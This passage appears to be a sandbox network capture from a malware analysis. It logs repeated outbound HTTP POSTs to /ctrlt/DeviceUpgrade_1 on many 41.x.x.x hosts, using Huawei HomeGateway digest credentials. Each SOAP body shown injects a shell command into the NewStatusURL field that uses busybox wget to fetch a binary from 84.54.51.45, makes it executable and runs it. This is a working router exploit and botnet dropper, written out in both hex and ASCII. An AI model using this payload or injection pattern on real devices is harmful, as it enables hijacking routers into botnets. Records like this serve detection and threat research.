                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2227192.168.2.155297841.18.177.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672586918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2228192.168.2.154329841.116.204.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672585964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2229192.168.2.153434041.1.14.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672595024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2230192.168.2.155636441.54.144.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672624111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2231192.168.2.153700241.138.197.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672640085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2232192.168.2.154320641.187.168.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672641039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2233192.168.2.155366041.38.137.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672682047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2234192.168.2.154927241.102.64.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672683954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2235192.168.2.153350841.45.63.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672730923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2236192.168.2.155974241.91.125.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672732115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
